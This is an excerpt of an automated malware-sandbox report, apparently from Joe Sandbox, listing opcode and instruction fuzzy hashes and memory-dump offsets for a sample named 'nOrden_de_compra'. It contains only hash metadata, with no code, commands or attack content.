                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 231b137a57cb0dced93b29e1f8814981b3f914d8a458400340b493d6b293f917
                                          • Instruction ID: 737951cdc1a98a659f6ee38e0a21ba40a663ce5507edb09a76535fb5b437e1d2
                                          • Opcode Fuzzy Hash: 231b137a57cb0dced93b29e1f8814981b3f914d8a458400340b493d6b293f917
                                          • Instruction Fuzzy Hash: F261F8B4E102198FDB54DFA9D894BADBBB2FB89300F208129D909BB398DB345D45CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4a507d267fe07b9ccef03fe4adeb1c4d6b6c5d7fb7c37a6c82d81ce7cffb577d
                                          • Instruction ID: 4af3e9eada16d90a63910b460565f692afb661f46119320d72584bdb59d89ca5
                                          • Opcode Fuzzy Hash: 4a507d267fe07b9ccef03fe4adeb1c4d6b6c5d7fb7c37a6c82d81ce7cffb577d
                                          • Instruction Fuzzy Hash: 9681D578E11228CFDB64DF64D890BADBBB2FB89300F108099E949A7355DB349D82CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6de98bd6c294c0363efbfba98571c4c9d3e1e499855306d605f31204d425eed8
                                          • Instruction ID: 0d4d9aa2c571bc9dd7fab93fa13664a4a27099282ce12af99210e1f92e091492
                                          • Opcode Fuzzy Hash: 6de98bd6c294c0363efbfba98571c4c9d3e1e499855306d605f31204d425eed8
                                          • Instruction Fuzzy Hash: B8510675E1021E9FCB04DFE9D484AEEBBB2FF89300F108029E905AB254DB749946DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 148c967dd2d3897e0a74ab30f86ff050ee1f4441d4e1811c52a82cd36597f93c
                                          • Instruction ID: 7101b32c631be47fbbdc9a4908fb6e4fe42ec81a8d95fb29255019aa13af0f20
                                          • Opcode Fuzzy Hash: 148c967dd2d3897e0a74ab30f86ff050ee1f4441d4e1811c52a82cd36597f93c
                                          • Instruction Fuzzy Hash: C641EF79E112299FCB04DFA8D884AEEBBB1FB4C320F149555E800B3354D775A995CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 131838582cc232db1dd5ab2b984e7dfec5958468babd04d1c11db555583845e2
                                          • Instruction ID: e1a1c29b950026e9868bfc263f238a88e82ca2fc0b800ed14cdfdc23c32cb2d8
                                          • Opcode Fuzzy Hash: 131838582cc232db1dd5ab2b984e7dfec5958468babd04d1c11db555583845e2
                                          • Instruction Fuzzy Hash: 7F41B2B4E11219EFDB04CFA9D884AEDBBB2FF89310F109119E805B3254CB749882DF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83fbc0835b8cddf1815c1493851989937a56559d812d7674030d6c11b52f270b
                                          • Instruction ID: fb215f9775ca284be891ae73f67955eaa0fbb8f95c9b389d5b2c12fe60e5f712
                                          • Opcode Fuzzy Hash: 83fbc0835b8cddf1815c1493851989937a56559d812d7674030d6c11b52f270b
                                          • Instruction Fuzzy Hash: 3241F3B4929628DFDB60CF14CC89799BBB1BB49305F0020D9EA09A3341DB709AC5DF04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4e621884b69e898feaeba322019534868ab09e92821c920311f5367acf925a4
                                          • Instruction ID: c89420ec16a84c6cd0084c8143c922eb0214c8ab6192c6cdafbc13398cb7b5d2
                                          • Opcode Fuzzy Hash: d4e621884b69e898feaeba322019534868ab09e92821c920311f5367acf925a4
                                          • Instruction Fuzzy Hash: A231B374E10219DFDB08DFA9C8406EEBBF2BF88300F10802AE905B7354EB7599469F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0231385a4a93abff26e75a513695eafeee0eb8b74f0a7f4ed540065b030a69f
                                          • Instruction ID: 60c04b84d7f8ec502663fc39ce692d120630c863eb904f6aec61fcb8f5210911
                                          • Opcode Fuzzy Hash: f0231385a4a93abff26e75a513695eafeee0eb8b74f0a7f4ed540065b030a69f
                                          • Instruction Fuzzy Hash: 4B314974E20219DFDB04DFA9C448AEEBBB2FB89310F018129D811A7354CB709D42DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112668751.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_125d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3706c339a7d7d233c143c37bfd72f72c9b0e59ef51562a70183aabf749447a57
                                          • Instruction ID: 96b5ca582ffe0a62b3a7bcd2642ba00d011431099a2041036243cec275443330
                                          • Opcode Fuzzy Hash: 3706c339a7d7d233c143c37bfd72f72c9b0e59ef51562a70183aabf749447a57
                                          • Instruction Fuzzy Hash: 06214876110208EFDB05DF44D9C0B66BF65FB84324F20C16CDE090B256C376E456CAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7c4da80ee76fd3a2663725615351471e33973e4a7a7fad95bd79a8f238f2bad
                                          • Instruction ID: 2727ea1f9ee0de63b63251ba45f17c314f721ceabf7b5094ea0c764d74569843
                                          • Opcode Fuzzy Hash: e7c4da80ee76fd3a2663725615351471e33973e4a7a7fad95bd79a8f238f2bad
                                          • Instruction Fuzzy Hash: BE3102B8E1020ACFDB44DFA9D4847AEBBF1FB89304F10946AD904A3294EB745A45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2533d4bd3d6462488e737963640af615ffedb33c034211685953c3de1a591e0
                                          • Instruction ID: 4a2e60eda56c40bab490f6f188fdc2105ace013424b5a7b9f6f1501a86502af4
                                          • Opcode Fuzzy Hash: f2533d4bd3d6462488e737963640af615ffedb33c034211685953c3de1a591e0
                                          • Instruction Fuzzy Hash: 0131F2B8E1020ADFDB44DFA9D4846EEBBF1FB89304F109469D904B3294EB746A45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1ff9c7ea4e82252b5b6cea703cdc0a3272ba74bb413bfe841291c1cbdc4d2ad
                                          • Instruction ID: 2f9770a9520c3ba9dbaa5707194c096b4bf569519fb03f88d4d51e47990ae142
                                          • Opcode Fuzzy Hash: e1ff9c7ea4e82252b5b6cea703cdc0a3272ba74bb413bfe841291c1cbdc4d2ad
                                          • Instruction Fuzzy Hash: 2B3116B8E2021EDFCB84DFA9C4956BEBBB1FB88300F108129D915A7344DB745942DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112740017.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_126d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c588f239d084b164f65be13275041bb1076df614225ccec551babefe045853a
                                          • Instruction ID: 1eb7fc4205687d420ff355cb4fa8b51bb4343340f4db41b4acbc102bf171d806
                                          • Opcode Fuzzy Hash: 7c588f239d084b164f65be13275041bb1076df614225ccec551babefe045853a
                                          • Instruction Fuzzy Hash: B221677561424CEFDB04CF54C9C0B25BBA9FB84324F20C56DD9890B292C37AD896CE61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112740017.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_126d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bb2bbde34aaf59074b9807fcf1083917d957514166d8000fa9a85b2cea226cf
                                          • Instruction ID: 326ff1322d74c11d0b3c461e73077b8103241711b903bc2768dfe6116554d6dd
                                          • Opcode Fuzzy Hash: 5bb2bbde34aaf59074b9807fcf1083917d957514166d8000fa9a85b2cea226cf
                                          • Instruction Fuzzy Hash: 732164B521430CEFDB04DF54C9C0B26BB69FB84314F20C5ACDA490B292C3BAD886CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa2439095c0293bf03730a04a5af51bd3b890daf30935aab58955d778e8c2147
                                          • Instruction ID: bf8b0cb0a8dbf075c8c7581f9734e146fcb4efc75eaadcd3612224f250da2995
                                          • Opcode Fuzzy Hash: aa2439095c0293bf03730a04a5af51bd3b890daf30935aab58955d778e8c2147
                                          • Instruction Fuzzy Hash: 652151B4D2421AEFDB04DFAAC0446BEBBB2FF88300F10C1A9D815A7244D7759992DF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61db5d180d57abaeadad70ddc82321c3d550192890d69b14581ecd43d4b7e159
                                          • Instruction ID: 554662af3e67f1000cd746782720659416d03fdd6697428afea55612852ff6c4
                                          • Opcode Fuzzy Hash: 61db5d180d57abaeadad70ddc82321c3d550192890d69b14581ecd43d4b7e159
                                          • Instruction Fuzzy Hash: E0219074A11908EFC704DF5AE68499DBBF1FF8C210B6280D5E8449B225DB31EE11DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c16ddd47c92ef6b5299aa340845b88e20b8d83d3079ccca62e5a38256526b96e
                                          • Instruction ID: 511b48180b653f9f79932bbfcecb4679f9fe584f5da5a2b1d208c19b79fb9f52
                                          • Opcode Fuzzy Hash: c16ddd47c92ef6b5299aa340845b88e20b8d83d3079ccca62e5a38256526b96e
                                          • Instruction Fuzzy Hash: D221E7B8D10209EFDB45DFA8D881AAEBFB1FF48310F1091A9E904A7250D7709B51DF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112668751.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_125d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction ID: 689f560ea18a8210bba57991ee21e9ad06c9d720c925170ee6c24076c35324b9
                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction Fuzzy Hash: 7611CDB6404284CFDB06CF44D5C0B56BF72FB84224F24C2A9DD090A256C33AE456CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112740017.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_126d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: d473d41575707add8207aa194db320143ad5452601f1809eea2a3c61ba540f9e
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: 7111BB79604288CFCB02CF54D6C0B19BFA1FB84214F24C6A9D9894B292C33AD45ACF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a8e9f888c00b13690136e7b6f2be0a9c603adc96c82118cfbafdf4c250eeb18
                                          • Instruction ID: d8d5e6197a165ca2356c2dab1a40448d50aec0e0847a5fb75dcdfa8c649a7b6f
                                          • Opcode Fuzzy Hash: 5a8e9f888c00b13690136e7b6f2be0a9c603adc96c82118cfbafdf4c250eeb18
                                          • Instruction Fuzzy Hash: 52018BB4D14209ABCB40EFAAD4457ADBBB5FB88300F1081A59C08D3344EB709A42DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9408e2528f588aea47d405b314cc9f86bb0e94a9285b67970c3e0515477323a
                                          • Instruction ID: f062c09f7dd02afb7d13099124059c4e01fc3931642da05badef857cac04ae62
                                          • Opcode Fuzzy Hash: e9408e2528f588aea47d405b314cc9f86bb0e94a9285b67970c3e0515477323a
                                          • Instruction Fuzzy Hash: F411B078921508EFCB40DF99E58999CBFB0FB48210F5281D5EC84A7325CB30AAA1CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc564225aef26624a235c4ff267343031d08d0c749d533179ce1c4843b0eeea0
                                          • Instruction ID: 486a195b3b64ac6af976dd209b16f12fa9292ccb85e4588736bd17ba0df03277
                                          • Opcode Fuzzy Hash: cc564225aef26624a235c4ff267343031d08d0c749d533179ce1c4843b0eeea0
                                          • Instruction Fuzzy Hash: 520117B4D2560ADFDB44DFAAC4453AEBBF5AB89300F1481A9D808E3200E7749A95DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c64d513e095e5595efb364cc25b386964cc8f06812297027a68ae2d6f385053
                                          • Instruction ID: 07c269930e089cfd7042d0392840cd0d5ca7d0b1c81997eb0955b2a456c83aec
                                          • Opcode Fuzzy Hash: 8c64d513e095e5595efb364cc25b386964cc8f06812297027a68ae2d6f385053
                                          • Instruction Fuzzy Hash: 570148B8D14209AFCB44EFAAD4456AEBBB5FB88300F1095A59C18D3304DBB05A45DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8aae6ac42b8b3c786393cc58c423d37da958169a90b078218887a54e387996e7
                                          • Instruction ID: 452fee14679fd0cf6d18438e2db837b5cf8e72b508b54369354028b945463517
                                          • Opcode Fuzzy Hash: 8aae6ac42b8b3c786393cc58c423d37da958169a90b078218887a54e387996e7
                                          • Instruction Fuzzy Hash: 51F0A0B10293889FC701CB70981A3583FF8DB0B101F2446A2DD04C7162EA789A09DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c0ff830193fe2c25f7b3dc53ed9220744a925ad86cc75ad85a578957528c139
                                          • Instruction ID: d6a21134b4c404ba042a47579c72e55a6f5ede0854b8b01f591036005a02cea6
                                          • Opcode Fuzzy Hash: 7c0ff830193fe2c25f7b3dc53ed9220744a925ad86cc75ad85a578957528c139
                                          • Instruction Fuzzy Hash: 44F0FFB8D14219DFDB44DFA9D4456ADBBB4FB49700F1086669C14E3300DB705A45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 024766ada98ba69fe2b00c4b5e4125c54762153cb027a3058a8cf67316a4f271
                                          • Instruction ID: 2f37f91518a0e66d9df6b2830a301ad814b47e28eef3be1fbec9c628426721c7
                                          • Opcode Fuzzy Hash: 024766ada98ba69fe2b00c4b5e4125c54762153cb027a3058a8cf67316a4f271
                                          • Instruction Fuzzy Hash: E0F08CB4D18208AFC740DBA8D84539CBBF4EB48300F10C1A9A808D3341D731DA52DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50d01222aec53f11b9e7433633c8cc8a29b97a408df6e7921c9aad9c31928083
                                          • Instruction ID: 0c8418578440f964684d5ff7bb108576725cac60159be572fa7cdd74c910bc26
                                          • Opcode Fuzzy Hash: 50d01222aec53f11b9e7433633c8cc8a29b97a408df6e7921c9aad9c31928083
                                          • Instruction Fuzzy Hash: 2FE022B5538294EBDB09EF60D4067AD7F36AB43210F00828CDC0503293CF399A47D7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa211bda9a3a8b13a318db60fbb88e5986c9fb376f146d3b063bab55be341326
                                          • Instruction ID: 3cfe8f8b66f4f8f9bb20bdcae42375ae9ccf8750c75ab802d4184e32fe23e363
                                          • Opcode Fuzzy Hash: fa211bda9a3a8b13a318db60fbb88e5986c9fb376f146d3b063bab55be341326
                                          • Instruction Fuzzy Hash: EBE0D874828218EBCB04EF50D4065EDBB39BB46300F004158DC0413211CF749F45EB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1407580df3790714ee4f8eae4d77517b46260363fba5d20e17d9635ceeb8b70e
                                          • Instruction ID: f9e2e2220103a24bfb95d7c3782419526487cfed082c2ff4c84a6c381210ffb4
                                          • Opcode Fuzzy Hash: 1407580df3790714ee4f8eae4d77517b46260363fba5d20e17d9635ceeb8b70e
                                          • Instruction Fuzzy Hash: 19E0DF78228285ABE345CAA0D504B6A7FA59B4620CF1482CCCC4847282CA76DD83CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction ID: 518ebb2d849249247e0b7449f2ef26755d61852acb54021fda41f0f09dfb6f2c
                                          • Opcode Fuzzy Hash: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction Fuzzy Hash: DFE0E5B4E14208EFCB94DFA9D4456ACBBF5EB88200F10C1E9A80893340D771AA52DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb6e2ff25454cc545eed3d3f60d81a3281d9321a854d9880eb07af1444e23657
                                          • Instruction ID: afcc2353be905a8df0412ea3535a36ec8121e87497a0af7a8de9783c58195377
                                          • Opcode Fuzzy Hash: fb6e2ff25454cc545eed3d3f60d81a3281d9321a854d9880eb07af1444e23657
                                          • Instruction Fuzzy Hash: AAE0E5B8914208EFCB40DF99D448A9CBBB4FF49300F1081A9EC4457321E771AE95EF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction ID: c48cd579cb1e3d987013fe667204ab947aa3ce111a7fc95bd00f2af89dc2c56b
                                          • Opcode Fuzzy Hash: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction Fuzzy Hash: C3E0EDB4D14208EFCB44DFA8D44569CBBF4EB48200F10C1A99C0893350D7719A42DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction ID: 05b0c0166e93796f28d3e78035b2c1cf30ecbab85724f97bd61002f9ff1e3938
                                          • Opcode Fuzzy Hash: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction Fuzzy Hash: D3E0E5B4E18208EFCB84DFA8D4456ACBBF4EB89200F10C5A9D80893350D771AE82DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddb152ee0ea20c1ac090cfe9673ba691b683a84de43837ea1c0ab2b226f2a6b0
                                          • Instruction ID: 92d483ebe676e5a2ce93d648ddfc1fe804f2f8519c174a74701540b87dc0c977
                                          • Opcode Fuzzy Hash: ddb152ee0ea20c1ac090cfe9673ba691b683a84de43837ea1c0ab2b226f2a6b0
                                          • Instruction Fuzzy Hash: 49E0ECB5425208EBCB00DFA4941A69D7BF8EB4A201F2056A5DD0993111EFB59A44EB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da2251bc9733cf8c393514dc4901c35760c825088edebf3b236f1f08a7f9e3c7
                                          • Instruction ID: 0f23c470e53e1b28cd1da8d1a26023ebe1e79c4b41a33d768e820be8b32f0e81
